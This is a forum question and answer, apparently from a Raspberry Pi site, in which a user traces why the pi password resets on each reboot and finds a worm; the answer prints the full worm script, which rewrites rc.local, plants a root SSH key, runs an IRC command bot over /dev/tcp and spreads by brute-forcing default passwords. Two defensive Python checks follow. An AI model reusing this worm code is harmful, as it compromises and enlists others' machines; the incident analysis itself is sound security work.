I am investigating this problem: pi's password is lost on every reboot. Summary of the problem: change pi's password with the passwd command -> reboot -> the changed password always turns into another password that we do not know.
Yes, I know that using the default pi account is bad for security, but in this topic I only focus on investigating the root cause.
After going through lots of search results on Google (such as https://raspberrypi.stackexchange.com/questions/73487/pis-password-is-lost-in-every-reboot and https://www.raspberrypi.org/forums/viewtopic.php?t=195378, and so on) without finding a solution to this nagging problem, I decided to investigate it myself. I have found half of the root cause.
I used this command to follow the authentication log
sudo tail /var/log/auth.log -n 100
I always see this log entry at the shutdown step
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
Then I tried renaming the usermod binary and shutting down
sudo mv /usr/sbin/usermod /usr/sbin/usermod-dell
Then it worked: the usermod binary was not called, and the pi account's password was not changed after the reboot. So this means that something calls usermod to change the pi account's password, but I still cannot trace exactly what that something is.
Here is the full log from the auth.log -n 100 command.
rp@raspberrypi:~ $ sudo tail /var/log/auth.log -n 100
[sudo] password for rp:
May 19 00:19:20 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:19:31 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 00:19:31 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:19:38 raspberrypi systemd-logind[478]: New seat seat0.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:39 raspberrypi usermod[824]: change user 'pi' password
May 19 00:19:40 raspberrypi sshd[847]: Received SIGHUP; restarting.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:46 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:19:46 raspberrypi systemd-logind[478]: New session c1 of user pi.
May 19 00:19:46 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:19:55 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:22:24 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:22:36 raspberrypi passwd[2138]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:22:47 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/passwd pi
May 19 00:22:47 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:22:55 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:23:11 raspberrypi passwd[2163]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:24:04 raspberrypi passwd[2235]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:24:43 raspberrypi passwd[2254]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:24:49 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/sbin/reboot
May 19 00:24:50 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on 0.0.0.0 port 22.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on :: port 22.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
May 19 00:25:03 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:25:04 raspberrypi systemd-logind[477]: New session c1 of user pi.
May 19 00:25:04 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:25:11 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:26:56 raspberrypi passwd[2064]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:27:10 raspberrypi passwd[2068]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost= user=pi
May 19 00:39:01 raspberrypi CRON[8534]: pam_unix(cron:session): session opened for user root by (uid=0)
May 19 00:39:02 raspberrypi CRON[8534]: pam_unix(cron:session): session closed for user root
May 19 00:44:32 raspberrypi sshd[9696]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.155 user=rp
May 19 00:44:34 raspberrypi sshd[9696]: Failed password for rp from 192.168.1.155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: Accepted password for rp from 192.168.1.155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 00:44:41 raspberrypi systemd-logind[477]: New session c2 of user rp.
May 19 00:44:41 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 00:44:57 raspberrypi sudo: pam_unix(sudo:auth): authentication failure; logname=rp uid=1003 euid=0 tty=/dev/pts/1 ruser=rp rhost= user=rp
May 19 00:45:03 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/sbin/update-rc.d noip2.sh enable
May 19 00:45:03 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:45:04 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:45:36 raspberrypi smbd[10031]: pam_unix(samba:session): session opened for user pi by (uid=0)
May 19 00:46:55 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:49:17 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:51:24 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/passwd pi
May 19 00:51:24 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:51:30 raspberrypi passwd[11384]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:51:30 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:51:39 raspberrypi sudo: rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 00:51:39 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:51:39 raspberrypi sshd[9696]: pam_unix(sshd:session): session closed for user rp
May 19 00:51:47 raspberrypi systemd-logind[475]: New seat seat0.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on 0.0.0.0 port 22.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on :: port 22.
May 19 00:51:48 raspberrypi usermod[859]: change user 'pi' password
May 19 00:51:55 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:51:55 raspberrypi systemd-logind[475]: New session c1 of user pi.
May 19 00:51:55 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:52:01 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:54:58 raspberrypi sshd[2091]: Accepted password for rp from 192.168.1.155 port 51869 ssh2
May 19 00:54:58 raspberrypi sshd[2091]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 00:54:58 raspberrypi systemd-logind[475]: New session c2 of user rp.
May 19 00:54:58 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 00:55:08 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:21 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:33 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 01:02:33 raspberrypi sshd[2091]: pam_unix(sshd:session): session closed for user rp
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:33 raspberrypi polkitd(authority=local): Unregistered Authentication Agent for unix-session:c1 (system bus name :1.12, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) (disconnected from bus)
May 19 01:02:40 raspberrypi systemd-logind[480]: New seat seat0.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on 0.0.0.0 port 22.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on :: port 22.
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
May 19 01:02:47 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 01:02:47 raspberrypi systemd-logind[480]: New session c1 of user pi.
May 19 01:02:47 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 01:02:53 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 01:04:53 raspberrypi sshd[2010]: Accepted password for rp from 192.168.1.155 port 51907 ssh2
May 19 01:04:53 raspberrypi sshd[2010]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 01:04:53 raspberrypi systemd-logind[480]: New session c2 of user rp.
May 19 01:04:53 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 01:05:01 raspberrypi sudo: rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 01:05:01 raspberrypi sudo: pam_unix(sudo:session): session opened for use
I tried creating a fake usermod bash script, shown below, to debug
#!/bin/bash
# Fake usermod wrapper: log when it runs, its environment and its arguments.
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
Here is the log result, but unfortunately I still cannot trace exactly what is calling usermod
usermod called at Sun 19 May 10:03:01 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhk$
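The pattern in the question is visible in auth.log alone: usermod changes pi's password a second after the boot marker, with no administrator sudo call in between. The following added example (not code from the question) turns that into a check over auth.log lines; the sample lines are constructed from the excerpt above, and the 120-second boot window is an assumption.

```python
import re
from datetime import datetime

# Constructed sample lines, modelled on the auth.log excerpt in the question:
# an administrator's passwd, a reboot, then usermod firing during early boot.
SAMPLE_LOG = """\
May 19 00:22:47 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/passwd pi
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:24:49 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/sbin/reboot
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
"""

LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ "
                     r"(?P<prog>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
USERMOD_RE = re.compile(r"change user '(?P<user>[^']+)' password")
SUDO_CMD_RE = re.compile(r"COMMAND=(?P<cmd>\S+)")


def boot_time_password_changes(log_text, boot_window=120):
    """Return usermod password changes logged within boot_window seconds of a
    boot marker ('New seat seat0.') with no sudo-invoked usermod in between.
    An administrator's change shows up as sudo COMMAND=.../usermod or via
    passwd; one fired by an init script (as in the question) does not."""
    findings, last_boot, admin_usermod = [], None, False
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines such as polkitd(...) are not relevant here
        # syslog timestamps carry no year; 1900 is fine for computing gaps
        ts = datetime.strptime(re.sub(r" +", " ", m["ts"]), "%b %d %H:%M:%S")
        prog, msg = m["prog"], m["msg"]
        if prog == "systemd-logind" and "New seat seat0" in msg:
            last_boot, admin_usermod = ts, False
        elif prog == "sudo":
            cmd = SUDO_CMD_RE.search(msg)
            if cmd and cmd["cmd"].endswith("/usermod"):
                admin_usermod = True
        elif prog == "usermod":
            u = USERMOD_RE.search(msg)
            if u is None or last_boot is None:
                continue
            gap = (ts - last_boot).total_seconds()
            if 0 <= gap <= boot_window and not admin_usermod:
                findings.append({"user": u["user"], "when": m["ts"],
                                 "seconds_after_boot": gap})
    return findings
```

On a live system, feed it the real log with boot_time_password_changes(open("/var/log/auth.log").read()); each finding names the account, the timestamp and how many seconds after boot the change landed.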
Answer 1
I finally got it!! Windows Defender warned me that this bash script is a virus.
I used the bash script below to debug what was calling usermod.
#!/bin/bash
# Fake usermod dropped in place of the real binary: records the environment,
# the parent process (the caller we are looking for) and the arguments.
(
echo "usermod called at $(date)"
echo "env"
env
# $PPID is the process that invoked "usermod"; print its user and command line.
ps -p $PPID -o ruser,pid,ppid,cmd
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
This is the result
usermod called at Sun 19 May 14:26:41 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
RUSER PID PPID CMD
root 597 590 /bin/bash /opt/M8Zsr10D
command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
Contents of /opt/M8Zsr10D
#!/bin/bash
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG
if [ "$EUID" -ne 0 ]
then
NEWMYSELF=`mktemp -u 'XXXXXXXX'`
sudo cp $MYSELF /opt/$NEWMYSELF
sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
sudo sh -c "echo 'exit 0' >> /etc/rc.local"
sleep 1
sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG
killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl
echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten
cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER
BOT=`mktemp -u 'XXXXXXXX'`
cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash
SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do
arr[0]="ix1.undernet.org"
arr[1]="ix2.undernet.org"
arr[2]="Ashburn.Va.Us.UnderNet.org"
arr[3]="Bucharest.RO.EU.Undernet.Org"
arr[4]="Budapest.HU.EU.UnderNet.org"
arr[5]="Chicago.IL.US.Undernet.org"
rand=$[$RANDOM % 6]
svr=${arr[$rand]}
eval 'exec 3<>/dev/tcp/$svr/6667;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
echo $NICK
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
# Main loop
while [ true ]; do
eval "read msg_in <&3;"
if [[ ! "$?" -eq 0 ]] ; then
break
fi
if [[ "$msg_in" =~ "PING" ]] ; then
printf "PONG %s\n" "${msg_in:5}";
eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
sleep 1
eval 'printf "JOIN #biret\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
privmsg_h=$(echo $msg_in| cut -d':' -f 3)
privmsg_data=$(echo $msg_in| cut -d':' -f 4)
privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
if [[ "$sign" == "$hash" ]] ; then
CMD=`echo $privmsg_data | base64 -d -i`
RES=`bash -c "$CMD" | base64 -w 0`
eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
fi
fi
done
done
EOFMARKER
chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT
NAME=`mktemp -u 'XXXXXXXX'`
date > /tmp/.s
apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done
fi
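The script above persists through /etc/rc.local, a randomly named copy in /opt, an entry in /root/.ssh/authorized_keys, an /etc/hosts line and the hard-coded password hash for pi. The following added triage check (not part of the answer) looks for exactly those traces under a root prefix, so a pulled SD card can be examined from another machine; build_fixture() creates a constructed mock of an infected root purely for demonstration, and the indicator values are copied from the script above.

```python
import os
import re
import tempfile

# Indicators taken from the /opt script shown in the answer; build_fixture()
# creates a constructed mock of an infected filesystem so this runs offline.
HOSTS_MARKER = "bins.deutschland-zahlung.eu"
KEY_FRAGMENT = "AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq"
PI_HASH_SALT = "$6$vGkGPKUr$"  # salt of the hash the script passes to usermod -p
RC_LOCAL_OPT = re.compile(r"^/opt/[A-Za-z0-9]{8}\s*$", re.M)  # mktemp -u 'XXXXXXXX'


def read(root, path):
    # root="/" for the live system; a mount point for an SD card imaged elsewhere
    try:
        with open(os.path.join(root, path.lstrip("/")), errors="replace") as f:
            return f.read()
    except OSError:
        return ""


def scan(root="/"):
    """Return the persistence indicators from the answer's script found under root."""
    hits = []
    for m in RC_LOCAL_OPT.finditer(read(root, "/etc/rc.local")):
        hits.append("rc.local starts random /opt script: " + m.group().strip())
    if HOSTS_MARKER in read(root, "/etc/hosts"):
        hits.append("/etc/hosts pins " + HOSTS_MARKER)
    if KEY_FRAGMENT in read(root, "/root/.ssh/authorized_keys"):
        hits.append("worm SSH key in /root/.ssh/authorized_keys")
    if any(e.startswith("pi:" + PI_HASH_SALT) for e in read(root, "/etc/shadow").splitlines()):
        hits.append("pi password hash carries the worm's salt")
    return hits


def build_fixture():
    """Constructed mock of an infected root; returns its path."""
    root = tempfile.mkdtemp()
    files = {
        "etc/rc.local": "#!/bin/sh -e\n/opt/M8Zsr10D\nexit 0\n",
        "etc/hosts": "127.0.0.1 localhost\n127.0.0.1 " + HOSTS_MARKER + "\n",
        "etc/shadow": "root:*:18000:0:99999:7:::\npi:" + PI_HASH_SALT + "abc:18000:0:99999:7:::\n",
        "root/.ssh/authorized_keys": "ssh-rsa " + KEY_FRAGMENT + "...\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(body)
    return root
```

Running scan() as root on the affected Pi, or scan("/mnt/sdcard") on a mounted image, prints nothing for a clean system and one line per surviving trace otherwise; the password salt check reports a match even after the hash itself has been rotated by the same script.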